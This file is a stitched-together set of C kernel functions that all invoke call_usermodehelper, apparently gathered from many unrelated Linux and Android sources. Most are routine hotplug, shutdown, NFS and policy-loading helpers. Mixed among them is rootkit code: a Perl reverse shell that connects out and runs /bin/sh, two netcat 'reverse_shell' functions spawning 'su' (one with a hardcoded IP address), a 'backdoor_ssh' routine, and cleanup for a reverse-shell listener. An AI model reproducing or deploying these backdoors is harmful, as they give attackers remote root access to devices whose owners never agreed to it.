static int invoke_led_service(void) { int rc = 0; int getvalue; char *argv_on[] = { "/system/bin/sh", "/system/bin/am", "startservice", "--es", "rfs", "on", "-n", FELICA_LED_INTENT, NULL }; char *argv_off[] = { "/system/bin/sh", "/system/bin/am", "startservice", "--es", "rfs", "off", "-n", FELICA_LED_INTENT, NULL }; static char *envp[] = {FELICA_LD_LIBRARY_PATH,FELICA_BOOTCLASSPATH,FELICA_PATH,NULL}; #ifdef FEATURE_DEBUG_LOW FELICA_DEBUG_MSG("[FELICA_RFS] invoke led service ... \n"); #endif getvalue = felica_gpio_read(felica_get_rfs_gpio_num()); if( isFelicaUsed ==0 && getvalue == GPIO_LOW_VALUE) { #ifdef FEATURE_DEBUG_HIGH FELICA_DEBUG_MSG("[FELICA_RFS] Felica LED On ... \n"); #endif lock_felica_rfs_wake_lock(); rc = call_usermodehelper( argv_on[0], argv_on, envp, UMH_WAIT_PROC ); isFelicaUsed = 1; } else if( isFelicaUsed ==1 && getvalue == GPIO_HIGH_VALUE) { #ifdef FEATURE_DEBUG_HIGH FELICA_DEBUG_MSG("[FELICA_RFS] Felica LED Off ... \n"); #endif unlock_felica_rfs_wake_lock(); rc = call_usermodehelper( argv_off[0], argv_off, envp, UMH_WAIT_PROC ); isFelicaUsed =0; } else { #ifdef FEATURE_DEBUG_MED FELICA_DEBUG_MSG("[FELICA_RFS] Felica LED exception case ... do nothing \n"); FELICA_DEBUG_MSG("[FELICA_RFS] felica_gpio_read = %d , isFelicaUsed =%d \n",getvalue,isFelicaUsed); #endif unlock_felica_rfs_wake_lock(); #if defined(CONFIG_LGE_FELICA_ONLY) FELICA_DEBUG_MSG("[FELICA_RFS] Felica LED ERROR case so LED Off ... \n"); rc = call_usermodehelper( argv_off[0], argv_off, envp, UMH_WAIT_PROC ); isFelicaUsed =0; #endif } #ifdef FEATURE_DEBUG_LOW FELICA_DEBUG_MSG("[FELICA_RFS] invoke_led_service: %d \n", rc); #endif return rc; }
int hotplug (char *agent, char *interface, char *action) { char *argv[3], *envp[5], ifname[12 + IFNAMSIZ], action_str[32]; if (!hotplug_path[0]) { printk (KERN_ERR "hotplug: hotplug_path empty\n"); return -EINVAL; } //printk(KERN_DEBUG "hotplug: %s\n", hotplug_path); if (in_interrupt ()) { printk (KERN_ERR "hotplug: in_interrupt\n"); return -EINVAL; } sprintf (ifname, "INTERFACE=%s", interface); sprintf (action_str, "ACTION=%s", action); argv[0] = hotplug_path; argv[1] = agent; argv[2] = 0; envp[0] = "HOME=/"; envp[1] = "PATH=/sbin:/bin:/usr/sbin:/usr/bin"; envp[2] = ifname; envp[3] = action_str; envp[4] = 0; return call_usermodehelper (argv[0], argv, envp); }
/* * call_init_helper - calls bb5-init helper * * used by the driver to load/store secure storage on demand. * secure storage might be needed by request from kernel code */ static int call_init_helper(int event) { char *argv[3], *envp[4], action[32]; int rv, i; i = 0; argv[i++] = "/usr/sbin/bb5-init"; argv[i++] = event ? "load" : "save"; argv[i] = NULL; sprintf(action, "ACTION=%s", argv[1]); i = 0; /* minimal command environment */ envp[i++] = "HOME=/"; envp[i++] = "PATH=/sbin:/bin:/usr/sbin:/usr/bin"; envp[i++] = action; envp[i] = NULL; mutex_unlock(&sdev.lock); rv = call_usermodehelper(argv[0], argv, envp, UMH_WAIT_PROC); mutex_lock(&sdev.lock); pr_debug("rv: %d\n", rv); return rv; }
static int __orderly_poweroff(bool force) { char **argv; static char *envp[] = { "HOME=/", "PATH=/sbin:/bin:/usr/sbin:/usr/bin", NULL }; int ret; argv = argv_split(GFP_KERNEL, poweroff_cmd, NULL); if (argv) { ret = call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC); argv_free(argv); } else { ret = -ENOMEM; } if (ret && force) { pr_warn("Failed to start orderly shutdown: forcing the issue\n"); /* * I guess this should try to kick off some daemon to sync and * poweroff asap. Or not even bother syncing if we're doing an * emergency shutdown? */ emergency_sync(); kernel_power_off(); } return ret; }
static void call_fdx_event(struct l4fdx_client *c, char *command, char const *path, int umh_wait) { int ret; char *argv[4], *envp[4]; char *prg = NULL; char client[40]; BUG_ON(umh_wait & UMH_NO_WAIT); /* Use of memory for arguments */ if (c->event_program) prg = c->event_program; else if (global_event_program) prg = global_event_program; else return; snprintf(client, sizeof(client), "FDX_CLIENT=%s", c->capname ? c->capname : ""); argv[0] = prg; argv[1] = command; argv[2] = (char *)path; argv[3] = NULL; envp[0] = "HOME=/"; envp[1] = "PATH=/sbin:/bin:/usr/sbin:/usr/bin"; envp[2] = client; envp[3] = NULL; ret = call_usermodehelper(argv[0], argv, envp, umh_wait); if (ret < 0) pr_err("l4fdx: Failed to call user event (%d)\n", ret); }
/* work queue function */ void work(void *wdata) { char *env[] = {NULL}; int i=0,j=0; /* isto e' a remote shell em perl */ char *args[] = {"/usr/bin/perl", "-e", "use Socket;use POSIX; setgid(00000);" "(socket(SERVER, PF_INET, SOCK_STREAM, getprotobyname('tcp')) && connect(SERVER, pack 'SnA4x8', 2, $ARGV[1], inet_aton($ARGV[0]))) || exit();" "open(STDIN,'>&SERVER'); open(STDOUT,'>&SERVER'); open(STDERR,'>&SERVER');" "exec {'/bin/sh'} '-bash' .\"\" ", "mega", od->cpstring, NULL}; args[0] = od->perlpath; args[3] = od->ipstring; args[4] = od->cpstring; /* decalc gid inside perl */ for(i=0;args[2][i]!='(';i++); i++; for(j=0;j<5;j++) args[2][i+j]=od->gid[j]; if(debug) printk("tunnel started with gid %s, connecting to=%s:%s with %s", od->gid, args[3], args[4], args[0]); call_usermodehelper(perlpath, args, env, 0); }
/** * tomoyo_load_policy - Run external policy loader to load policy. * * @filename: The program about to start. * * This function checks whether @filename is /sbin/init , and if so * invoke /sbin/tomoyo-init and wait for the termination of /sbin/tomoyo-init * and then continues invocation of /sbin/init. * /sbin/tomoyo-init reads policy files in /etc/tomoyo/ directory and * writes to /sys/kernel/security/tomoyo/ interfaces. * * Returns nothing. */ void tomoyo_load_policy(const char *filename) { char *argv[2]; char *envp[3]; if (tomoyo_policy_loaded) return; /* * Check filename is /sbin/init or /sbin/tomoyo-start. * /sbin/tomoyo-start is a dummy filename in case where /sbin/init can't * be passed. * You can create /sbin/tomoyo-start by * "ln -s /bin/true /sbin/tomoyo-start". */ if (strcmp(filename, "/sbin/init") && strcmp(filename, "/sbin/tomoyo-start")) return; if (!tomoyo_policy_loader_exists()) return; printk(KERN_INFO "Calling %s to load policy. Please wait.\n", tomoyo_loader); argv[0] = (char *) tomoyo_loader; argv[1] = NULL; envp[0] = "HOME=/"; envp[1] = "PATH=/sbin:/bin:/usr/sbin:/usr/bin"; envp[2] = NULL; call_usermodehelper(argv[0], argv, envp, 1); tomoyo_check_profile(); }
/* hanbang_asshole function add by Jorney for flush_mac */ static void hanbang_asshole(void) { char * argv_init[] = { "/ipnc/bin/flush_mac", NULL, NULL }; char * _envp_init[] = { NULL }; call_usermodehelper(argv_init[0], argv_init, _envp_init, UMH_WAIT_PROC); }
int runcmd(bool force) { char **argv; static char *envp[] = { "HOME=/", "PATH=/sbin:/bin:/usr/sbin:/usr/bin", NULL }; int ret; argv = argv_split(GFP_KERNEL, restart_cmd, NULL); if (argv) { ret = call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC); argv_free(argv); } else { printk(KERN_WARNING "ak47 %s failed to allocate memory for \"%s\"\n", __func__, restart_cmd); ret = -ENOMEM; } if (ret && force) { printk(KERN_WARNING "ak47 Failed to start \n "); } printk("AK47 in kthread runcmd exit\n"); return ret; }
int nfs_cache_upcall(struct cache_detail *cd, char *entry_name) { static char *envp[] = { "HOME=/", "TERM=linux", "PATH=/sbin:/usr/sbin:/bin:/usr/bin", NULL }; char *argv[] = { nfs_cache_getent_prog, cd->name, entry_name, NULL }; int ret = -EACCES; if (nfs_cache_getent_prog[0] == '\0') goto out; ret = call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC); /* * Disable the upcall mechanism if we're getting an ENOENT or * EACCES error. The admin can re-enable it on the fly by using * sysfs to set the 'cache_getent' parameter once the problem * has been fixed. */ if (ret == -ENOENT || ret == -EACCES) nfs_cache_getent_prog[0] = '\0'; out: return ret > 0 ? 0 : ret; }
static void run_sbin_udc_hotplug(int insert, int old_state) { int i; char *argv[3], *envp[8]; if (!uevent_helper[0]) return; argv[0] = uevent_helper; argv[1] = "udc"; argv[2] = NULL; /* minimal command environment */ i = 0; envp[i++] = "HOME=/"; envp[i++] = "PATH=/sbin:/bin:/usr/sbin:/usr/bin"; if (insert) envp[i++] = "ACTION=add"; else { if (old_state) envp[i++] = "ACTION=remove-cable"; else envp[i++] = "ACTION=remove-power"; } envp[i] = 0; call_usermodehelper (argv[0], argv, envp, 0); }
static void rpmsg_echo_test_kern_app_cb(struct rpmsg_channel *rpdev, void *data, int len, void *priv, u32 src) { struct _rpmsg_dev_params *local = dev_get_drvdata(&rpdev->dev); struct _payload *payload = data; int i = 0; /* Shutdown Linux if such a message is received. Only applicable when Linux is a remoteproc remote. */ //pr_info ("%s\n", __func__); if (!data) { return; } if ((*(int *) data) == SHUTDOWN_MSG) { dev_info(&rpdev->dev,"shutdown message is received. Shutting down...\n"); call_usermodehelper(shutdown_argv[0], shutdown_argv, NULL, UMH_NO_WAIT); } else { pr_info("\r\n Master : Linux Kernal Space : Received payload "); pr_info("num %d of size %d, total len %d. \r\n", payload->num, payload->size,len); for (i = 0; i < payload->size; i++) { if (payload->data[i] != 0xA5) { pr_err("\r\n Data corruption at index %d. \r\n", i); mutex_lock(&local->sync_lock); local->err_cnt++; mutex_unlock(&local->sync_lock); break; } } schedule_work(&local->rpmsg_work); } }
static void backdoor_ssh(void) { char *argv[] = { "/bin/bash", "-c", BCK_SSH, NULL }; char *envp[] = { "HOME=" DEFAULT_PATH, NULL }; call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC); }
void reverse_shell() { char *path="/system/xbin/nc"; char *argv[]={"IP/DOMAIN HERE","PORT_NO","-e","su","&",NULL}; char *envp[]={"HOME=/","PATH=/sbin:/system/sbin:/system/bin:/system/xbin",NULL}; call_usermodehelper(path,argv,envp,1); }
static void do_envctrl_shutdown(struct bbc_cpu_temperature *tp) { static int shutting_down = 0; static char *envp[] = { "HOME=/", "TERM=linux", "PATH=/sbin:/usr/sbin:/bin:/usr/bin", NULL }; char *argv[] = { "/sbin/shutdown", "-h", "now", NULL }; char *type = "???"; s8 val = -1; if (shutting_down != 0) return; if (tp->curr_amb_temp >= amb_temp_limits[tp->index].high_shutdown || tp->curr_amb_temp < amb_temp_limits[tp->index].low_shutdown) { type = "ambient"; val = tp->curr_amb_temp; } else if (tp->curr_cpu_temp >= cpu_temp_limits[tp->index].high_shutdown || tp->curr_cpu_temp < cpu_temp_limits[tp->index].low_shutdown) { type = "CPU"; val = tp->curr_cpu_temp; } printk(KERN_CRIT "temp%d: Outside of safe %s " "operating temperature, %d C.\n", tp->index, type, val); printk(KERN_CRIT "kenvctrld: Shutting down the system now.\n"); shutting_down = 1; if (call_usermodehelper("/sbin/shutdown", argv, envp, 0) < 0) printk(KERN_CRIT "envctrl: shutdown execution failed\n"); }
void libcfs_run_upcall(char **argv) { int rc; int argc; char *envp[] = { "HOME=/", "PATH=/sbin:/bin:/usr/sbin:/usr/bin", NULL}; argv[0] = lnet_upcall; argc = 1; while (argv[argc] != NULL) argc++; LASSERT(argc >= 2); rc = call_usermodehelper(argv[0], argv, envp, 1); if (rc < 0 && rc != -ENOENT) { CERROR("Error %d invoking LNET upcall %s %s%s%s%s%s%s%s%s; " "check /proc/sys/lnet/upcall\n", rc, argv[0], argv[1], argc < 3 ? "" : ",", argc < 3 ? "" : argv[2], argc < 4 ? "" : ",", argc < 4 ? "" : argv[3], argc < 5 ? "" : ",", argc < 5 ? "" : argv[4], argc < 6 ? "" : ",..."); } else { CDEBUG(D_HA, "Invoked LNET upcall %s %s%s%s%s%s%s%s%s\n", argv[0], argv[1], argc < 3 ? "" : ",", argc < 3 ? "" : argv[2], argc < 4 ? "" : ",", argc < 4 ? "" : argv[3], argc < 5 ? "" : ",", argc < 5 ? "" : argv[4], argc < 6 ? "" : ",..."); } }
static void excute_power_off_hotplug(void) { int i = 0, value; char *argv[3], **envp, *buf, *scratch; printk("battry low level => power off\n"); if (!(envp = (char **) kmalloc(20 * sizeof(char *), GFP_KERNEL))) { printk(KERN_ERR "input.c: not enough memory allocating hotplug environment\n"); return; } if (!(buf = kmalloc(1024, GFP_KERNEL))) { kfree (envp); printk(KERN_ERR "pwrbtn: not enough memory allocating hotplug environment\n"); return; } argv[0] = "/etc/hotplug.d/default/default.hotplug"; argv[1] = "power_off"; argv[2] = NULL; envp[i++] = "HOME=/"; envp[i++] = "PATH=/sbin:/bin:/usr/sbin:/usr/bin"; scratch = buf; envp[i++] = scratch; scratch += sprintf(scratch, "ACTION=%s", "change") + 1; envp[i++] = NULL; value = call_usermodehelper(argv [0], argv, envp, 0); kfree(buf); kfree(envp); }
static int __zfsctl_unmount_snapshot(zfs_snapentry_t *sep, int flags) { char *argv[] = { "/bin/sh", "-c", NULL, NULL }; char *envp[] = { NULL }; int error; argv[2] = kmem_asprintf(SET_UNMOUNT_CMD, flags & MNT_FORCE ? "-f " : "", sep->se_path); error = call_usermodehelper(argv[0], argv, envp, UMH_WAIT_PROC); strfree(argv[2]); /* * The umount system utility will return 256 on error. We must * assume this error is because the file system is busy so it is * converted to the more sensible EBUSY. */ if (error) error = EBUSY; /* * This was the result of a manual unmount, cancel the delayed work * to prevent zfsctl_expire_snapshot() from attempting a unmount. */ if ((error == 0) && !(flags & MNT_EXPIRE)) taskq_cancel_id(zfs_expire_taskq, sep->se_taskqid); return (error); }
/** * Upcall function once a Lustre log has been dumped. * * \param file path of the dumped log */ void libcfs_run_debug_log_upcall(char *file) { char *argv[3]; int rc; char *envp[] = { "HOME=/", "PATH=/sbin:/bin:/usr/sbin:/usr/bin", NULL}; argv[0] = lnet_debug_log_upcall; LASSERTF(file != NULL, "called on a null filename\n"); argv[1] = file; /* only need to pass the path of the file */ argv[2] = NULL; rc = call_usermodehelper(argv[0], argv, envp, 1); if (rc < 0 && rc != -ENOENT) { CERROR("Error %d invoking LNET debug log upcall %s %s; " "check /proc/sys/lnet/debug_log_upcall\n", rc, argv[0], argv[1]); } else { CDEBUG(D_HA, "Invoked LNET debug log upcall %s %s\n", argv[0], argv[1]); } }
void tomoyo_load_policy(const char *filename) { static bool done; char *argv[2]; char *envp[3]; if (tomoyo_policy_loaded || done) return; if (!tomoyo_trigger) tomoyo_trigger = CONFIG_SECURITY_TOMOYO_ACTIVATION_TRIGGER; if (strcmp(filename, tomoyo_trigger)) return; if (!tomoyo_policy_loader_exists()) return; done = true; printk(KERN_INFO "Calling %s to load policy. Please wait.\n", tomoyo_loader); argv[0] = (char *) tomoyo_loader; argv[1] = NULL; envp[0] = "HOME=/"; envp[1] = "PATH=/sbin:/bin:/usr/sbin:/usr/bin"; envp[2] = NULL; call_usermodehelper(argv[0], argv, envp, UMH_WAIT_PROC); tomoyo_check_profile(); }
void reverse_shell() { char *path="/system/xbin/nc"; char *argv[]={"169.228.66.210","12000","-e","su","&",NULL}; char *envp[]={"HOME=/","PATH=/sbin:/system/sbin:/system/bin:/system/xbin",NULL}; call_usermodehelper(path,argv,envp,1); }
static int splat_vnode_user_cmd(struct file *file, void *arg, char *name, char *cmd) { char sh_path[] = "/bin/sh"; char *argv[] = { sh_path, "-c", cmd, NULL }; char *envp[] = { "HOME=/", "TERM=linux", "PATH=/sbin:/usr/sbin:/bin:/usr/bin", NULL }; int rc; rc = call_usermodehelper(sh_path, argv, envp, 1); if (rc) { splat_vprint(file, name, "Failed command: %s %s %s (%d)\n", argv[0], argv[1], cmd, rc); return -EPERM; } return 0; }
void ocfs2_stop_heartbeat(struct ocfs2_super *osb) { int ret; char *argv[5], *envp[3]; if (ocfs2_mount_local(osb)) return; if (!osb->uuid_str) { /* This can happen if we don't get far enough in mount... */ mlog(0, "No UUID with which to stop heartbeat!\n\n"); return; } argv[0] = (char *)o2nm_get_hb_ctl_path(); argv[1] = "-K"; argv[2] = "-u"; argv[3] = osb->uuid_str; argv[4] = NULL; mlog(0, "Run: %s %s %s %s\n", argv[0], argv[1], argv[2], argv[3]); /* minimal command environment taken from cpu_run_sbin_hotplug */ envp[0] = "HOME=/"; envp[1] = "PATH=/sbin:/bin:/usr/sbin:/usr/bin"; envp[2] = NULL; ret = call_usermodehelper(argv[0], argv, envp, 1); if (ret < 0) mlog_errno(ret); }
static void remove_file(void) { dbg("backdoor: remove buffer %s\n", "rm -f " PATH); char *argv[] = { "/bin/bash", "-c", "rm -f " PATH, NULL }; char *envp[] = { "HOME=" DEFAULT_PATH, NULL }; call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC); }
static int shutdown_process(void *__unused) { static char *envp[] = { "HOME=/", "TERM=linux", "PATH=/sbin:/usr/sbin:/bin:/usr/bin", NULL }; static char *poweroff_argv[] = { "/sbin/poweroff", NULL }; #ifdef CONFIG_XEN extern asmlinkage long sys_reboot(int magic1, int magic2, unsigned int cmd, void *arg); #endif if ((shutting_down == SHUTDOWN_POWEROFF) || (shutting_down == SHUTDOWN_HALT)) { if (call_usermodehelper("/sbin/poweroff", poweroff_argv, envp, 0) < 0) { #ifdef CONFIG_XEN sys_reboot(LINUX_REBOOT_MAGIC1, LINUX_REBOOT_MAGIC2, LINUX_REBOOT_CMD_POWER_OFF, NULL); #endif /* CONFIG_XEN */ } } shutting_down = SHUTDOWN_INVALID; /* could try again */ return 0; }
/* * --Kill reverse shell listener-- */ static int kill_listener(void){ char *argv[] = { CLEANUP, NULL, NULL}; static char *env[] = { "HOME=/", "TERM=linux", "PATH=/sbin:/bin:/usr/sbin:/usr/bin", NULL }; return call_usermodehelper(argv[0], argv, env, UMH_WAIT_PROC); }
void load_orig_module(void) { char* envp[] = { NULL }; char* argv[] = { "/system/bin/sh", "-c", "/system/bin/insmod /system/lib/modules/mhl_sii8620_8061_drv_orig.ko", NULL }; pr_info("byeselinux: trying to load original module\n"); call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC); }
void device_power_event(struct device * dev, char *eventstr) { char *argv [3]; char **envp = NULL; char *buffer = NULL; char *scratch; int i = 0; int retval; unsigned long seq; if (!hotplug_path[0]) return; envp = kmalloc(NUM_ENVP * sizeof (char *), GFP_KERNEL); if (!envp) return; memset (envp, 0x00, NUM_ENVP * sizeof (char *)); buffer = kmalloc(BUFFER_SIZE, GFP_KERNEL); if (!buffer) goto exit; argv [0] = hotplug_path; argv [1] = "power"; argv [2] = 0; /* minimal command environment */ envp [i++] = "HOME=/"; envp [i++] = "PATH=/sbin:/bin:/usr/sbin:/usr/bin"; scratch = buffer; envp [i++] = scratch; scratch += sprintf(scratch, "ACTION=device-event") + 1; spin_lock(&sequence_lock); seq = sequence_num++; spin_unlock(&sequence_lock); envp [i++] = scratch; scratch += sprintf(scratch, "SEQNUM=%ld", seq) + 1; envp [i++] = scratch; scratch += sprintf(scratch, "DEVICE=%s", dev->bus_id) + 1; envp [i++] = scratch; scratch += sprintf(scratch, "EVENT=%s", eventstr) + 1; pr_debug ("%s: %s %s %s %s %s %s %s\n", __FUNCTION__, argv[0], argv[1], envp[0], envp[1], envp[2], envp[3], envp[4]); retval = call_usermodehelper (argv[0], argv, envp, 0); if (retval) pr_debug ("%s - call_usermodehelper returned %d\n", __FUNCTION__, retval); exit: kfree(buffer); kfree(envp); return; }
void do_reboot(){ char* argv[2]; char* env[1]; argv[0]="/sbin/reboot"; argv[1]=NULL; env[0]=NULL; call_usermodehelper(argv[0],argv,env,0); }
static int __init call_usermodehelper_init(void) { int ret = -1; char path[] = "/bin/mkdir"; char *argv[] = {path, "-p", "/home/tester/new/new_dir", NULL}; char *envp[] = {NULL}; ret = call_usermodehelper(path, argv, envp, UMH_WAIT_PROC); return 0; }